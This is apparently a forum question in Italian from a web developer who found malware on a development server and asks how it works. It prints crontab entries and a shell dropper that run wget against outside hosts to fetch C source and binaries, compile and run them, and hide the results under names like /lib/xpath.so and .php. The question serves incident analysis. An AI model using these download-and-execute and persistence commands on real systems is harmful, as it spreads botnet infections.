Sto usando un server di sviluppo in cui ho trovato questo nel crontab:
[...]
* * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1
@weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/shm/tmp/.rnd
[...]
I contenuti di http://stablehost.us/bots/regular.bot
sono:
#!/bin/sh
if [ $(whoami) = "root" ]; then
echo y|yum install perl-libwww-perl perl-IO-Socket-SSL openssl-devel zlib1g-dev gcc make
echo y|apt-get install libwww-perl apt-get install libio-socket-ssl-perl openssl-devel zlib1g-dev gcc make
pkg_add -r wget;pkg_add -r perl;pkg_add -r gcc
wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o a a.c;mv a /lib/xpath.so;chmod +x /lib/xpath.so;/lib/xpath.so;rm -rf a.c
wget -q http://linksys.secureshellz.net/bots/b -O /lib/xpath.so.1;chmod +x /lib/xpath.so.1;/lib/xpath.so.1
wget -q http://linksys.secureshellz.net/bots/a -O /lib/xpath.so.2;chmod +x /lib/xpath.so.2;/lib/xpath.so.2
exit 1
fi
wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o .php a.c;rm -rf a.c;chmod +x .php; ./.php
wget -q http://linksys.secureshellz.net/bots/a -O .phpa;chmod +x .phpa; ./.phpa
wget -q http://linksys.secureshellz.net/bots/b -O .php_ ;chmod +x .php_;./.php_
Non riesco a contattare il sysadmin per vari motivi, quindi non posso chiedere informazioni su questo a lui.
Mi sembra che questo script scarica alcuni codici sorgente e binari C remoti, li compila ed esegue.
Sono uno sviluppatore web, quindi non sono un esperto di linguaggio C, ma guardando i file scaricati mi sembra un bot iniettato nel cron del server.
Puoi darmi ulteriori informazioni su cosa fa questo codice? A proposito del suo funzionamento, dei suoi scopi?
UPDATE : Sappiamo, purtroppo, che è un malware ... Mi chiedo: come funziona? puoi darmi dettagli su questo?